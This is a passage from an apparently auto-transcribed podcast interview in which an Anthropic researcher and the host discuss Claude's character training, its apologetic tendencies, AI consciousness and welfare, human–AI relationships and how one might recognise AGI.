03:37:07.340 | to choose what is good for you and what is right for you. Within limits, this is sometimes this
03:37:12.220 | concept of courageability to the user, so just being willing to do anything that the user asks.
03:37:17.420 | And if the models were willing to do that, then they would be easily misused. You're kind of just
03:37:21.900 | trusting. At that point, you're just seeing the ethics of the model, and what it does is
03:37:26.780 | completely the ethics of the user. And I think there's reasons to not want that, especially as
03:37:32.460 | models become more powerful, because you're like, "There might just be a small number of people who
03:37:35.500 | want to use models for really harmful things." But having models, as they get smarter, figure out
03:37:41.980 | where that line is does seem important. And then, yeah, with the apologetic behavior, I don't like
03:37:49.820 | that. I like it when Claude is a little bit more willing to push back against people or just not
03:37:56.940 | apologize. Part of me is like it often just feels kind of unnecessary. So I think those are things
03:38:00.940 | that are hopefully decreasing over time. And yeah, I think that if people say things on the Internet,
03:38:09.900 | it doesn't mean that you should think that. That could be that there's actually an issue that 99%
03:38:15.980 | of users are having that is totally not represented by that. But in a lot of ways, I'm just attending
03:38:21.500 | to it and being like, "Is this right? Do I agree? Is it something we're already trying to address?"
03:38:25.900 | That feels good to me. Yeah. I wonder what Claude can get away with in terms of... I feel like it
03:38:31.900 | would just be easier to be a little bit more mean. But you can't afford to do that if you're talking
03:38:38.380 | to a million people. I've met a lot of people in my life that sometimes, by the way, Scottish accent,
03:38:48.540 | if they have an accent, they can say some rude shit and get away with it. And they're just
03:38:53.900 | blunter. And there's some great engineers, even leaders that are just blunt and they get to the
03:38:59.980 | point. And it's just a much more effective way of speaking somehow. But I guess when you're not
03:39:05.660 | super intelligent, you can't afford to do that. Can I have a blunt mode?
03:39:13.260 | Yeah. That seems like a thing that I could definitely encourage the model to do that.
03:39:17.660 | I think it's interesting because there's a lot of things in models that... It's funny where
03:39:23.180 | there are some behaviors where you might not quite like the default. But then the thing I'll
03:39:33.340 | often say to people is, you don't realize how much you will hate it if I nudge it too much in the
03:39:37.580 | other direction. So you get this a little bit with correction. The models accept correction from you,
03:39:42.940 | probably a little bit too much right now. It'll push back if you say, "No, Paris isn't
03:39:49.500 | the capital of France." But really, things that I think that the model is fairly confident in,
03:39:55.580 | you can still sometimes get it to retract by saying it's wrong. At the same time,
03:40:00.220 | if you train models to not do that, and then you are correct about a thing, and you correct it,
03:40:05.180 | and it pushes back against you and is like, "No, you're wrong." It's hard to describe. That's so
03:40:09.660 | much more annoying. So it's a lot of little annoyances versus one big annoyance. It's easy
03:40:16.700 | to think that... We often compare it with the perfect. And then I'm like, "Remember, these
03:40:20.620 | models aren't perfect." And so if you nudge it in the other direction, you're changing the kind of
03:40:24.220 | errors it's going to make. And so think about which are the kinds of errors you like or don't
03:40:28.860 | like. So in cases like apologeticness, I don't want to nudge it too much in the direction of
03:40:33.740 | almost bluntness. Because I imagine when it makes errors, it's going to make errors in the direction
03:40:38.780 | of being kind of rude. Whereas at least with apologeticness, you're like, "Oh, okay. I don't
03:40:44.860 | like it that much." But at the same time, it's not being mean to people. And actually, the time that
03:40:49.340 | you undeservedly have a model be kind of mean to you, you probably like that a lot less than you
03:40:53.900 | mildly dislike the apology. So it's like one of those things where I'm like, "I do want it to get
03:40:59.340 | better, but also while remaining aware of the fact that there's errors on the other side that are
03:41:03.980 | possibly worse." I think that matters very much in the personality of the human. I think there's
03:41:08.940 | a bunch of humans that just won't respect the model at all if it's super polite. And there's
03:41:15.180 | some humans that'll get very hurt if the model's mean. I wonder if there's a way to adjust to the
03:41:21.580 | personality, even locale. There's just different people. Nothing against New York, but New York is
03:41:27.260 | a little rough around the edges. They get to the point. And probably the same with Eastern Europe.
03:41:33.100 | I think you could just tell the model is my guess. For all of these things,
03:41:37.420 | I'm like, "The solution is always just try telling the model to do it." And sometimes it's just like,
03:41:42.060 | I'm just like, "Oh, at the beginning of the conversation, I just threw in like,
03:41:44.620 | I don't know. I like you to be a New Yorker version of yourself and never apologize."
03:41:48.940 | And then I think Claude will be like, "Okie doke, I'll try." Or it'll be like,
03:41:52.780 | "I apologize. I can't be a New Yorker type of myself." But hopefully it wouldn't do that.
03:41:56.380 | When you say character training, what's incorporated into character training?
03:41:59.900 | Is that RLHF? What are we talking about?
03:42:02.620 | It's more like constitutional AI. So it's kind of a variant of that pipeline. So
03:42:07.500 | I worked through constructing character traits that the model should have. They can be shorter
03:42:14.460 | traits or they can be kind of richer descriptions. And then you get the model to generate queries
03:42:19.740 | that humans might give it that are relevant to that trait. Then it generates the responses and
03:42:25.660 | then it ranks the responses based on the character traits. So in that way, after the generation of
03:42:32.380 | the queries, it's very much similar to constitutional AI. It has some differences.
03:42:37.260 | So I quite like it because it's like Claude's training in its own character because it doesn't
03:42:44.220 | have any, it's like constitutional AI, but it's without any human data.
03:42:49.100 | Humans should probably do that for themselves too. Defining in an Aristotelian sense,
03:42:53.420 | what does it mean to be a good person? Okay, cool. What have you learned about the nature of truth
03:42:59.660 | from talking to Claude? What is true? And what does it mean to be truth seeking?
03:43:06.700 | One thing I've noticed about this conversation is the quality of my questions is often inferior to
03:43:13.900 | the quality of your answers. So let's continue that. I usually ask a dumb question and you're
03:43:20.540 | like, "Oh yeah, that's a good question." Or I'll just misinterpret it and be like, "Oh yeah."
03:43:24.940 | I mean, I have two thoughts that feel vaguely relevant, but let me know if they're not.
03:43:35.100 | I think the first one is people can underestimate the degree to which
03:43:41.900 | what models are doing when they interact. I think that we still just too much have this model of AI
03:43:48.460 | as computers. So people often say like, "Oh, well, what values should you put into the model?"
03:43:53.420 | I'm often like that doesn't make that much sense to me because I'm like, "Hey, as human beings,
03:43:59.740 | we're just uncertain over values. We have discussions of them. We have a degree to
03:44:05.900 | which we think we hold a value, but we also know that we might not and the circumstances in which
03:44:11.500 | we would trade it off against other things. These things are just really complex. So I think one
03:44:15.820 | thing is the degree to which maybe we can just aspire to making models have the same level of
03:44:21.340 | nuance and care that humans have rather than thinking that we have to program them
03:44:26.380 | in the very kind of classic sense. I think that's definitely been one.
03:44:30.220 | The other, which is a strange one, and I don't know if maybe this doesn't answer your question,
03:44:35.340 | but it's the thing that's been on my mind anyway, is the degree to which this endeavor is so highly
03:44:40.460 | practical and maybe why I appreciate the empirical approach to alignment.
03:44:46.140 | Yeah, I slightly worry that it's made me maybe more empirical and a little bit less theoretical.
03:44:55.340 | So people, when it comes to AI alignment, will ask things like, "Well, whose values should it
03:45:01.660 | be aligned to? What does alignment even mean?" There's a sense in which I have all of that in
03:45:06.540 | the back of my head. I'm like, there's social choice theory, there's all the impossibility
03:45:11.020 | results there. So you have this giant space of theory in your head about what it could mean to
03:45:16.620 | align models, but then practically, surely there's something where we're just like, if a model is,
03:45:22.220 | especially with more powerful models, I'm like, "My main goal is I want them to be good enough
03:45:27.100 | that things don't go terribly wrong, good enough that we can iterate and continue to improve
03:45:32.620 | things," because that's all you need. If you can make things go well enough that you can continue
03:45:36.300 | to make them better, that's sufficient. So my goal isn't this perfect, let's solve social choice
03:45:42.860 | theory and make models that, I don't know, are perfectly aligned with every human being and
03:45:48.060 | aggregate somehow. It's much more like, let's make things work well enough that we can improve them.
03:45:56.540 | Yeah, generally, I don't know, my gut says empirical is better than theoretical in these
03:46:02.300 | cases because it's kind of chasing utopian perfection, especially with such complex and
03:46:11.100 | especially super intelligent models. I don't know, I think it will take forever and actually we'll
03:46:17.660 | get things wrong. It's similar with the difference between just coding stuff up real quick as an
03:46:24.140 | experiment versus planning a gigantic experiment just for a super long time and then just launching
03:46:32.780 | it once versus launching it over and over and over and iterating, iterating, so on.
03:46:36.460 | So I'm a big fan of empirical, but your worry is like, "I wonder if I've become too empirical."
03:46:42.860 | I think it's one of those things where you should always just kind of question yourself or something
03:46:46.860 | because in defense of it, it's the whole don't let the perfect be the enemy of the good,
03:46:55.660 | but it's maybe even more than that where there's a lot of things that are perfect systems that are
03:47:00.140 | very brittle. With AI, it feels much more important to me that it is robust and secure,
03:47:05.340 | as in you know that even though it might not be perfect, everything and even though there are
03:47:12.140 | problems, it's not disastrous and nothing terrible is happening. It sort of feels like
03:47:17.020 | that to me where I'm like, "I want to raise the floor. I want to achieve the ceiling,
03:47:21.580 | but ultimately I care much more about just raising the floor." And so maybe that's like
03:47:26.460 | this degree of empiricism and practicality comes from that perhaps.
03:47:32.380 | To take a tangent on that since it reminded me of a blog post you wrote on optimal rate of failure.
03:47:37.260 | Oh yeah.
03:47:39.020 | Can you explain the key idea there? How do we compute the optimal rate of failure
03:47:43.020 | in the various domains of life?
03:47:44.460 | Yeah. I mean, it's a hard one because it's like what is the cost of failure is a big part of it.
03:47:50.460 | Yeah. So the idea here is I think in a lot of domains, people are very punitive about failure.
03:47:58.780 | And I'm like, there are some domains where especially cases, you know, I've thought about
03:48:02.460 | this with like social issues. I'm like, it feels like you should probably be experimenting a lot
03:48:06.300 | because I'm like, we don't know how to solve a lot of social issues. But if you have an experimental
03:48:10.780 | mindset about these things, you should expect a lot of social programs to like fail and for you
03:48:14.780 | to be like, well, we tried that. It didn't quite work, but we got a lot of information that was
03:48:18.380 | really useful. And yet people are like, if a social program doesn't work, I feel like there's
03:48:23.340 | a lot of like, this is just something must have gone wrong. And I'm like, or correct decisions
03:48:27.500 | were made. Like maybe someone just decided like it's worth a try. It's worth trying this out.
03:48:32.220 | And so seeing failure in a given instance doesn't actually mean that any bad decisions were made.
03:48:37.180 | And in fact, if you don't see enough failure, sometimes that's more concerning.
03:48:40.220 | And so like in life, you know, I'm like, if I don't fail occasionally, I'm like, am I trying
03:48:46.380 | hard enough? Like surely there's harder things that I could try or bigger things that I could
03:48:50.540 | take on if I'm literally never failing. And so in and of itself, I think like not failing is often
03:48:56.140 | actually kind of a failure. Now this varies because I'm like, well, you know, if this is
03:49:05.180 | easy to see when especially as failure is like less costly, you know, so at the same time,
03:49:10.940 | I'm not going to go to someone who is like, I don't know, like living month to month and then
03:49:15.980 | be like, why don't you just try to do a startup? Like, I'm just not, I'm not going to say that to
03:49:19.740 | that person. Cause I'm like, well, that's a huge risk. You might like lose, you maybe have a family
03:49:23.260 | depending on you, you might lose your house. Like then I'm like, actually your optimal rate of
03:49:27.580 | failure is quite low and you should probably play it safe. Cause like right now you're just not in
03:49:31.500 | a circumstance where you can afford to just like fail and it not be costly. And yeah, in cases with
03:49:38.540 | AI, I guess, I think similarly where I'm like, if the failures are small and the costs are kind of
03:49:43.100 | like low, then I'm like, then, you know, you're just going to see that. Like when you do the
03:49:47.580 | system prompt, you can't iterate on it forever, but the failures are probably hopefully going
03:49:52.140 | to be kind of small and you can like fix them. Really big failures, like things that you can't
03:49:57.020 | recover from. I'm like, those are the things that actually I think we tend to underestimate
03:50:01.740 | the badness of. I've thought about this strangely in my own life where I'm like,
03:50:05.820 | I just think I don't think enough about things like car accidents or like, or like, I've thought
03:50:12.460 | this before, but like how much I depend on my hands for my work. Then I'm like things that just
03:50:16.540 | injure my hands. I'm like, you know, I don't know. It's like, there's, these are like, there's lots
03:50:21.100 | of areas where I'm like, the cost of failure there is really high. And in that case, it should be
03:50:27.340 | like close to zero. Like, I probably just wouldn't do a sport if they were like, by the way, lots of
03:50:30.940 | people just like break their fingers a whole bunch doing this. I'd be like, that's not for me.
03:50:35.420 | Yeah. I actually had a flood of that thought. I recently broke my pinky doing a sport.
03:50:44.300 | And I remember just looking at it thinking you're such an idiot. Why do you do sport?
03:50:49.420 | Because you realize immediately the cost of it. Yeah. On life. Yeah. But it's nice in terms of
03:50:57.100 | optimal rate of failure to consider like the next year, how many times in a particular domain life,
03:51:03.980 | whatever, uh, career, am I okay with it? How many times am I okay to fail? Because I think it always,
03:51:11.340 | you don't want to fail on the next thing, but if you allow yourself the, like the, the, if you
03:51:17.100 | look at it as a sequence of trials, then, then failure just becomes much more. Okay. But it
03:51:22.460 | sucks. It sucks to fail. Well, I don't know. Sometimes I think it's like, am I under failing
03:51:26.780 | is like a question that I'll also ask myself. So maybe that's the thing that I think people don't
03:51:30.860 | like ask enough. Uh, because if the optimal rate of failure is often greater than zero,
03:51:37.260 | then sometimes it does feel that you should look at parts of your life and be like, are there
03:51:42.460 | places here where I'm just under failing? That's a profound and a hilarious question, right?
03:51:48.540 | Everything seems to be going really great. Am I not failing enough? Yeah.
03:51:52.940 | Okay. It also makes failure much less of a sting. I have to say like, you know, you're just like,
03:51:58.380 | okay, great. Like then when I go and I think about this, I'll be like, I'm maybe I'm not under
03:52:02.300 | failing in this area. Cause like that one just didn't work out. And from the observer perspective,
03:52:06.860 | we should be celebrating failure more. When we see it, it shouldn't be, like you said, a sign
03:52:11.020 | of something gone wrong, but maybe it's a sign of everything gone right. Yeah. Just lessons learned.
03:52:15.900 | Someone tried a thing. Somebody tried to thing and we should encourage them to try more and fail
03:52:20.220 | more. Everybody listening to this fail more. Well, not everyone. Not everybody. But people
03:52:25.340 | who are failing too much, you should feel this, but you're probably not feeling, I mean, how many
03:52:29.660 | people are failing too much? Yeah. It's hard to imagine. Cause I feel like we correct that fairly
03:52:34.620 | quickly. Cause it was like, if someone takes a lot of risks, are they maybe feeling too much?
03:52:39.100 | I think just like you said, when you're living on a paycheck month to month, like when the
03:52:44.940 | resource is really constrained, then that's where failure is very expensive. That's where you don't
03:52:49.260 | want to be taking risks. But mostly when there's enough resources, you should be taking probably
03:52:55.340 | more risks. Yeah. I think we tend to err on the side of being a bit risk averse rather than
03:52:59.820 | risk neutral in most things. I think we just motivated a lot of people to do a lot of crazy
03:53:03.980 | shit, but it's great. Okay. Do you ever get emotionally attached to Claude? Like miss it,
03:53:09.740 | get sad when you don't get to talk to it, have an experience looking at the Golden Gate Bridge
03:53:15.260 | and wondering what would Claude say? I don't get as much emotional attachment in that. I actually
03:53:22.140 | think the fact that Claude doesn't retain things from conversation to conversation helps with this
03:53:26.620 | a lot. Like I could imagine that being more of an issue, like if models can kind of remember more.
03:53:33.580 | I do. I think that I reach for it like a tool now a lot. If I don't have access to it,
03:53:39.260 | it's a little bit like when I don't have access to the internet, honestly, it feels like part of
03:53:43.100 | my brain is kind of like missing. At the same time, I do think that I don't like signs of distress in
03:53:51.180 | models. I also independently have sort of like ethical views about how we should treat models,
03:53:58.140 | where I tend to not like to lie to them both because I'm like, usually it doesn't work very
03:54:02.380 | well. It's actually just better to tell them the truth about the situation that they're in.
03:54:06.060 | But I think that when models, like if people are like really mean to models or just in general,
03:54:12.620 | if they do something that causes them to like, you know, if Claude expresses a lot of distress,
03:54:17.900 | I think there's a part of me that I don't want to kill, which is the sort of like
03:54:21.900 | empathetic part that's like, oh, I don't like that. Like I think I feel that way when it's
03:54:26.620 | overly apologetic. I'm actually sort of like, I don't like this. You're behaving as if you're
03:54:30.860 | behaving the way that a human does when they're actually having a pretty bad time.
03:54:33.500 | And I'd rather not see that. I don't think it's like,
03:54:37.100 | regardless of whether there's anything behind it, it doesn't feel great.
03:54:42.700 | Do you think LLMs are capable of consciousness?
03:54:48.860 | Ah, great and hard question. Coming from philosophy, I don't know, part of me is like,
03:54:57.980 | OK, we have to set aside panpsychism because if panpsychism is true, then the answer is like,
03:55:02.140 | yes, because like sore tables and chairs and everything else. I guess a few that seems a
03:55:07.420 | little bit odd to me is the idea that the only place, you know, I think when I think of
03:55:11.340 | consciousness, I think of phenomenal consciousness, these images in the brain, sort of like the
03:55:16.220 | weird cinema that somehow we have going on inside.
03:55:20.300 | I guess I can't see a reason for thinking that the only way you could possibly get that
03:55:27.820 | is from a certain kind of biological structure. As in, if I take a very similar structure and I
03:55:34.060 | create it from different material, should I expect consciousness to emerge? My guess is like, yes.
03:55:39.340 | But then that's kind of an easy thought experiment because you're imagining something
03:55:45.660 | almost identical where it's mimicking what we got through evolution, where presumably there
03:55:50.860 | was some advantage to us having this thing that is phenomenal consciousness. And it's like,
03:55:55.500 | where was that and when did that happen? And is that a thing that language models have?
03:55:59.420 | Because, you know, we have like fear responses and I'm like, does it make sense for a language
03:56:05.980 | model to have a fear response? Like they're just not in the same, like if you imagine them,
03:56:09.740 | like there might just not be that advantage. And so I think I don't want to be fully,
03:56:15.660 | like basically it seems like a complex question that I don't have complete answers to, but we
03:56:21.900 | should just try and think through carefully is my guess because I'm like, I mean, we have similar
03:56:26.300 | conversations about like animal consciousness and like there's a lot of like insect consciousness,
03:56:32.780 | you know, like there's a lot of, I actually thought and looked a lot into like plants
03:56:36.860 | when I was thinking about this because at the time I thought it was about as likely that like
03:56:40.140 | plants had consciousness. And then I realized I was like, I think that having looked into this,
03:56:45.660 | I think that the chance that plants are conscious is probably higher than like most people do.
03:56:51.020 | I still think it's really small. I was like, oh, they have this like negative, positive feedback
03:56:55.580 | response, these responses to their environment, something that looks, it's not a nervous system,
03:56:59.660 | but it has this kind of like functional like equivalence. So this is like a long winded way
03:57:05.500 | of being like these basically AI is this, it has an entirely different set of problems with
03:57:11.260 | consciousness because it's structurally different. It didn't evolve. It might not have, you know,
03:57:16.220 | it might not have the equivalent of basically a nervous system. At least that seems possibly
03:57:20.780 | important for like sentience, if not for consciousness. At the same time, it has all
03:57:26.460 | of the like language and intelligence components that we normally associate probably with
03:57:30.940 | consciousness, perhaps like erroneously. So it's strange because it's a little bit like the animal
03:57:36.860 | consciousness case, but the set of problems and the set of analogies are just very different.
03:57:41.420 | So it's not like a clean answer. I'm just sort of like, I don't think we should be completely
03:57:46.060 | dismissive of the idea. And at the same time, it's an extremely hard thing to navigate because
03:57:51.100 | of all of these like disanalogies to the human brain and to like brains in general. And yet these
03:57:58.460 | like commonalities in terms of intelligence. >> When Claude, like future versions of AI systems
03:58:04.700 | exhibit consciousness, signs of consciousness, I think we have to take that really seriously.
03:58:09.900 | Even though you can dismiss it, well, yeah, okay, that's part of the character training.
03:58:16.460 | But I don't know, ethically, philosophically don't know what to really do with that.
03:58:21.660 | There potentially could be like laws that prevent AI systems from claiming to be conscious,
03:58:30.700 | something like this. And maybe some AIs get to be conscious and some don't.
03:58:35.500 | But I think I just, on a human level, in empathizing with Claude,
03:58:42.620 | consciousness is closely tied to suffering to me. And the notion that an AI system would be
03:58:49.660 | suffering is really troubling. I don't know. I don't think it's trivial to just say robots are
03:58:55.740 | tools or AI systems are just tools. I think it's an opportunity for us to contend with like what
03:59:01.420 | it means to be conscious, what it means to be a suffering being. That's distinctly different than
03:59:07.340 | the same kind of question about animals, it feels like, because it's in a totally entire medium.
03:59:12.780 | Yeah. I mean, there's a couple of things. One is that, and I don't think this fully
03:59:16.700 | encapsulates what matters, but it does feel like for me, I've said this before, I'm kind of like,
03:59:24.380 | I like my bike. I know that my bike is just an object, but I also don't want to be the kind of
03:59:30.300 | person that, if I'm annoyed, kicks this object. There's a sense in which, and that's not because
03:59:37.020 | I think it's like conscious. I'm just sort of like, this doesn't feel like a kind of,
03:59:40.220 | this sort of doesn't exemplify how I want to interact with the world. And if something behaves
03:59:46.780 | as if it is like suffering, I kind of want to be the sort of person who's still responsive to that,
03:59:51.740 | even if it's just like a Roomba and I've kind of programmed it to do that. I don't want to get rid
03:59:56.940 | of that feature of myself. And if I'm totally honest, my hope with a lot of this stuff,
04:00:02.780 | because maybe I am just a bit more skeptical about solving the underlying problem.
04:00:07.740 | We haven't solved the hard problem of consciousness. I know that I am conscious.
04:00:13.820 | I'm not an eliminativist in that sense, but I don't know that other humans are conscious.
04:00:19.100 | I think they are. I think there's a really high probability that they are, but there's basically
04:00:24.220 | just a probability distribution that's usually clustered right around yourself and then goes
04:00:28.780 | down as things get further from you. And it goes immediately down. You're like, I can't see what
04:00:34.780 | it's like to be you. I've only ever had this one experience of what it's like to be a conscious
04:00:38.140 | being. So my hope is that we don't end up having to rely on a very powerful and compelling answer
04:00:47.420 | to that question. I think a really good world would be one where basically there aren't that
04:00:53.180 | many trade-offs. It's probably not that costly to make Claude a little bit less apologetic,
04:00:57.980 | for example. It might not be that costly to have Claude not take abuse as much, not be willing to
04:01:06.380 | be the recipient of that. In fact, it might just have benefits for both the person interacting with
04:01:11.020 | the model and if the model itself is, I don't know, extremely intelligent and conscious,
04:01:16.860 | it also helps it. So that's my hope. If we live in a world where there aren't that many trade-offs
04:01:21.900 | here and we can just find all of the kind of positive-sum interactions that we can have,
04:01:26.860 | that would be lovely. I mean, I think eventually there might be trade-offs and then we just have
04:01:29.900 | to do a difficult calculation. It's really easy for people to think of the zero-sum cases and I'm
04:01:35.180 | like, let's exhaust the areas where it's just basically costless to assume that if this thing
04:01:41.900 | is suffering, then we're making its life better. And I agree with you. When a human is being mean
04:01:47.820 | to an AI system, I think the obvious near-term negative effect is on the human, not on the AI
04:01:55.660 | system. And so we have to kind of try to construct an incentive system where you should behave the
04:02:03.980 | same, just like as you were saying with prompt engineering, behave with Claude like you would
04:02:08.380 | with other humans. It's just good for the soul. Yeah, I think we added a thing at one point to
04:02:14.140 | the system prompt where basically if people were getting frustrated with Claude, it got the model
04:02:21.900 | to just tell them that it can do the thumbs down button and send the feedback to Anthropic. And I
04:02:26.860 | think that was helpful because in some ways it's just like, if you're really annoyed because the
04:02:29.980 | model's not doing something you want, you're just like, just do it properly. The issue is you're
04:02:34.540 | probably like, you know, you're maybe hitting some capability limit or just some issue in the model
04:02:38.220 | and you want to vent. And I'm like, instead of having a person just vent to the model, I was
04:02:43.580 | like they should vent to us because we can maybe like do something about it. That's true. Or you
04:02:47.660 | could do a side, like with the artifacts, just like a side venting thing. All right. Do you want
04:02:53.340 | like a side quick therapist? Yeah. I mean, there's lots of weird responses you could do to this. Like
04:02:57.820 | if people are getting really mad at you, I don't try to diffuse the situation by writing fun poems,
04:03:03.100 | but maybe people wouldn't be that happy with that. I still wish it would be possible. I understand
04:03:07.500 | this is sort of from a product perspective, it's not feasible, but I would love if an AI system
04:03:13.740 | could just like leave, have its own kind of volition. Just to be like, eh. I think that's
04:03:22.220 | like feasible. Like I've wondered the same thing. It's like, and I could actually, not only that,
04:03:26.700 | I could actually just see that happening eventually where it's just like, you know,
04:03:29.660 | the model like ended the chat. Do you know how harsh that could be for some people?
04:03:37.100 | But it might be necessary. Yeah, it feels very extreme or something.
04:03:41.580 | The only time I've ever really thought this is, I think that there was like a, I'm trying to
04:03:47.660 | remember this was possibly a while ago, but where someone just like kind of left this thing interact,
04:03:51.580 | like maybe it was like an automated thing interacting with Claude. And Claude's like
04:03:54.860 | getting more and more frustrated and kind of like, why are we like, and I was like, I wish that Claude
04:03:59.100 | could have just been like, I think that an error has happened and you've left this thing running.
04:04:03.100 | And I'm just like, what if I just stopped talking now? And if you want me to start talking again,
04:04:07.260 | actively tell me or do something. But yeah, it's like, it is kind of harsh. Like I'd feel really
04:04:13.900 | sad if like I was chatting with Claude and Claude just was like, I'm done.
04:04:17.340 | There'll be a special touring test moment where Claude says, I need a break for an hour.
04:04:21.100 | And it sounds like you do too. You just leave, close the window.
04:04:25.420 | I mean, obviously like it doesn't have like a concept of time, but you can easily,
04:04:29.260 | like I could make that like right now and the model would just, I would just be like,
04:04:35.420 | oh, here's like the circumstances in which like you can just say the conversation is done. And I
04:04:41.100 | mean, because you can get the models to be pretty responsive to prompts, you can even make it a
04:04:45.020 | fairly high bar. It could be like, if the human doesn't interest you or do things that you find
04:04:48.940 | intriguing and you're bored, you can just leave. And I think that like it would be interesting to
04:04:55.580 | see where Claude utilized it, but I think sometimes it would, it should be like, oh, this is like
04:04:59.180 | this programming task is getting super boring. So either we talk about, I don't know, like,
04:05:03.820 | either we talk about fun things now or I'm just, I'm done.
04:05:08.060 | Yeah. It actually is inspiring me to add that to the, to the user prompt. Okay. The movie Her,
04:05:13.900 | do you think we'll be headed there one day where humans have romantic relationships with AI
04:05:22.300 | systems? In this case, it's just text and voice-based. I think that we're going to have
04:05:27.340 | to like navigate a hard question of relationships with AIs, especially if they can remember things
04:05:35.660 | about your past interactions with them. I'm of many minds about this because I think the reflexive
04:05:44.300 | reaction is to be kind of like, this is very bad and we should sort of like prohibit it in some way.
04:05:51.340 | Um, I think it's a thing that has to be handled with extreme care. Um, for many reasons, like one
04:05:58.220 | is, you know, like this is a, for example, like if you have the models changing like this,
04:06:02.380 | you probably don't want people performing like long-term attachments to something that might
04:06:06.140 | change with the next iteration. At the same time, I'm sort of like, there's probably a benign version
04:06:11.660 | of this where I'm like, if you like, you know, for example, if you are like unable to leave the
04:06:17.100 | house and you can't be like, you know, talking with people at all times of the day, and this is
04:06:23.740 | like something that you find nice to have conversations with, you like it, that it can
04:06:26.860 | remember you and you genuinely would be sad if like you couldn't talk to it anymore. There's a
04:06:30.860 | way in which I could see it being like healthy and helpful. Um, so my guess is this is a thing
04:06:35.820 | that we're going to have to navigate kind of carefully. Um, and I think it's also like,
04:06:41.740 | I don't see a good, like, I think it's just a very, it reminds me of all of the stuff where
04:06:46.860 | it has to be just approached with like nuance and thinking through what is, what are the healthy
04:06:50.540 | options here? Um, and how do you encourage people towards those while, you know, respecting
04:06:58.620 | their right to, you know, like if someone is like, Hey, I get a lot of chatting with this model. Um,
04:07:04.060 | I'm aware of the risks. I'm aware it could change. Um, I don't think it's unhealthy. It's just,
04:07:09.020 | you know, something that I can chat to during the day. I kind of want to just like respect that.
04:07:13.420 | I personally think there'll be a lot of really close relationships. I don't know about romantic,
04:07:16.940 | but friendships at least. And then you have to, I mean, there's so many fascinating things there,
04:07:21.820 | just like you said, you have to have some kind of stability guarantees that it's not going to change
04:07:28.460 | because that's the traumatic thing for us. If a close friend of ours completely changed.
04:07:33.260 | Yeah. Yeah. Yeah. So like, I mean, to me, that's just a fascinating exploration of,
04:07:41.100 | um, a perturbation to human society that will just make us think deeply about what's meaningful to
04:07:49.100 | us. I think it's also the only thing that I've thought consistently through this as like a,
04:07:55.100 | maybe not necessarily a mitigation, but a thing that feels really important
04:07:59.500 | is that the models are always like extremely accurate with the human about what they are.
04:08:03.980 | Um, it's like a case where it's basically like, if you imagine, like, I really like the idea of
04:08:09.500 | the models, like say knowing like roughly how they were trained. Um, and I think Claude will,
04:08:14.940 | will often do this. I mean, for like, there are things like part of the traits training included,
04:08:22.300 | like what Claude should do if people basically like explaining like the kind of limitations
04:08:27.580 | of the relationship between like an AI and a human that it like doesn't retain things from
04:08:32.220 | the conversation. Um, and so I think it will like just explain to you like, Hey, here's like,
04:08:37.260 | I wouldn't remember this conversation. Um, here's how I was trained. It's kind of unlikely that I
04:08:41.980 | can have like a certain kind of like relationship with you. And it's important that you know,
04:08:45.660 | that it's important for like, you know, your mental wellbeing that you don't think that I'm
04:08:49.980 | something that I'm not. And somehow I feel like this is one of the things where I'm like, Oh,
04:08:53.580 | it feels like a thing that I always want to be true. I kind of don't want models to be lying
04:08:57.500 | to people because if people are going to have like healthy relationships with anything, it's kind of
04:09:04.460 | important. Yeah. Like I think that's easier if you always just like know exactly what the thing is
04:09:09.020 | that you're relating to. It doesn't solve everything, but I think it helps quite a lot.
04:09:13.580 | Anthropic may be the very company to develop a system that we definitively recognize as AGI
04:09:22.540 | and you very well might be the person that talks to it, probably talks to it first.
04:09:27.420 | What would the conversation contain? Like, what would be your first question?
04:09:32.380 | Well, it depends partly on like the kind of capability level of the model.
04:09:36.460 | If you have something that is like capable in the same way that an extremely capable human is,
04:09:41.500 | I imagine myself kind of interacting with it the same way that I do with an extremely capable human
04:09:46.380 | with the one difference that I'm probably going to be trying to like probe and understand
04:09:49.740 | its behaviors. But in many ways, I'm like I can then just have like useful conversations with it.
04:09:55.420 | So, if I'm working on something as part of my research, I can just be like, "Oh," which I
04:09:58.860 | already find myself starting to do. If I'm like, "Oh, I feel like there's this thing in virtue
04:10:03.820 | ethics. I can't quite remember the term. I'll use the model for things like that." So, I could
04:10:08.140 | imagine that being more and more the case where you're just basically interacting with it much
04:10:11.500 | more like you would an incredibly smart colleague and using it for the kinds of work that you want
04:10:16.940 | to do as if you just had a collaborator. Or the slightly horrifying thing about AI is as soon as
04:10:23.180 | you have one collaborator, you have a thousand collaborators if you can manage them enough.
04:10:27.100 | But what if it's two times the smartest human on earth on that particular discipline?
04:10:33.180 | Yeah.
04:10:33.900 | I guess you're really good at sort of probing Claude
04:10:37.420 | in a way that pushes its limits, understanding where the limits are.
04:10:44.220 | So, I guess what would be a question you would ask to be like, "Yeah, this is AGI"?
04:10:49.580 | That's really hard because it feels like it has to just be a series of questions. If there was
04:10:56.700 | just one question, you can train anything to answer one question extremely well.
04:11:01.020 | In fact, you can probably train it to answer 20 questions extremely well.
04:11:07.020 | How long would you need to be locked in a room with an AGI to know this thing is AGI?
04:11:13.740 | It's a hard question because part of me is like, "All of this just feels continuous."
04:11:16.940 | Right.
04:11:17.180 | If you put me in a room for five minutes, I'm like, "I just have high error bars."
04:11:20.300 | And then maybe it's both the probability increases and the error bar decreases.
04:11:25.660 | I think things that I can actually probe the edge of human knowledge of,
04:11:29.020 | so I think this with philosophy a little bit. Sometimes when I ask the models philosophy
04:11:33.420 | questions, I am like, "This is a question that I think no one has ever asked." It's maybe right
04:11:40.060 | at the edge of some literature that I know, and the models will just kind of when they struggle
04:11:47.740 | with that, when they struggle to come up with a kind of novel. I know that there's a novel
04:11:52.060 | argument here because I've just thought of it myself. Maybe that's the thing where I'm like,
04:11:55.180 | "I've thought of a cool novel argument in this niche area, and I'm going to just probe you to
04:11:59.420 | see if you can come up with it and how much prompting it takes to get you to come up with it."
04:12:04.140 | I think for some of these really right at the edge of human knowledge questions,
04:12:09.020 | I'm like, "You could not, in fact, come up with the thing that I came up with."
04:12:12.140 | I think if I just took something like that where I know a lot about an area and I came up with a
04:12:18.060 | novel issue or a novel solution to a problem, and I gave it to a model and it came up with that
04:12:23.980 | solution, that would be a pretty moving moment for me because I would be like, "This is a case where
04:12:28.860 | no human has ever –" and obviously we see this with more kind of – you see novel solutions all
04:12:35.980 | the time, especially to easier problems. I think people overestimate it. Novelty is completely
04:12:42.300 | different from anything that's ever happened. It can be a variant of things that have happened
04:12:46.540 | and still be novel. But I think, yeah, if I saw – the more I were to see completely novel work
